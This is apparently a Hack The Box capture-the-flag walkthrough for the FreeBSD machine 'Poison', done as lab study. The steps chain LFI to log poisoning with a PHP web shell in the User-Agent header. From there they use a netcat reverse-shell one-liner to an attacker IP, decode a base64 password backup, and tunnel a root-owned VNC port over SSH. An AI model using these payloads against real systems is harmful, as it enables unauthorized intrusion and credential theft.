HTB Poison Walkthrough
Poison is an interesting medium FreeBSD box that runs a simple web page vulnerable to LFI, we utilize this security defect to leverage the LFI to log poisoning which gives us RCE on the machine, then we ssh tunnel the port 5901 that runs VNC locally as root to our attacking machine, and we use a secret file that we found on the server to authenticate to the VNC as root
ًWe start with Nmap scan to check for open ports and services
nmap -sT -sV -sC 10.10.10.84
- Port 22 ssh is open and it runs OpenSSH 7.2
- Port 80 HTTP is open and it runs apache 2.4.29
ًWe navigate to http://10.10.10.84 in the browser, and we get a simple web app that includes and runs(tests) some PHP scripts.
Trying listfiles.php will give us
An array containing all the files that we can test for.
Typing pwdbackup.txt in the will give us the password for the user Charix encoded 13 times in base64
But we will not do the box this way because it’s a very easy, unrealistic real-life scenario, and it’s not the intended way of doing the box, and solving the box this way will not benefit our learning process.
In the URL we see that there is a file named file, and it’s used to include files to the server from different locations.
If we try to enter the name of a file that doesn’t exist we will get an error that reveals the path of the apache
We try LFI, I tried to read the /etc/passwd file, and I was able to read it, so now we know that the machine is vulnerable to LFI
Now we should try to read httpd.conf and if we manage to read it, it will show us the path to the log files
The access logs are located in /var/log/httpd-access.log
The phpinfo showing us that allow_url_include is turned off so we can forget about RFI
Accessing the access.log file
Now let’s try injecting PHP code in the logs (poisoning it) through the web-agent.
So we intercept the request in Burp and we change the content in
User-Agent to
<?php system($_REQUEST[‘cmd’]); ?>
Now we have poisoned the logs, we navigate to the access log file again and we use the argument cmd
http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=ls -la
We got code execution on the server.
Now we listen on port 4444 using Netcat
On the victim machine that runs FreeBSD we use
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc 10.10.16.206 4444 > /tmp/f
Escalating to user Charix:
Now we can read the pwdbackup.txt and decode the password and log in to the box as user Charix using SSH
We copy the password in a file in our local machine, and we name it pass then we run
pass=$(cat pass); for i in $(seq 1 13); do pass=$(echo $pass | tr -d ‘ ‘ | base64 -d); done; echo $passThis will give us Charix!2#4%6&8(0
Now we can SSH to the box using these creds
In the home directory of the user Charix we can see a zip file named Charix, we unzip the file, and when it asked for a password we enter Charix’s passwords and the output of it will be a binary named secret
Let's transfer the secret.zip to our machine using SCP
scp user@remoteMachineIP:/pathToTheFile PathToWhereWeCopyItscp charix@10.10.10.84:/home/charix/secret.zip .
We upload Linpeas to the server from our local machine using python simpleHTTPServer and we run it.
Escalating to root:
Looking at the running processes we can see that there is VNC running as a root
Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1let’s break down the command:
- rfbauth /root/.vnc/passwd specifies auth file for authenticating users
-rfbport 5901- the port to connect to
localhost- listen locally
Checking the networking, we can see that VNC listening on port 5801 and 5901
So now we have to SSH tunnel the port 5901 through ssh to our machine we do this by running the command
ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84and when we check the network connections on our machine we see that we are listening locally on 5901 so we managed to ssh tunnel the port
Now we connect to the machine using the vncviewer and the secret file
vncviewer 127.0.0.1:5901 -passwd secret
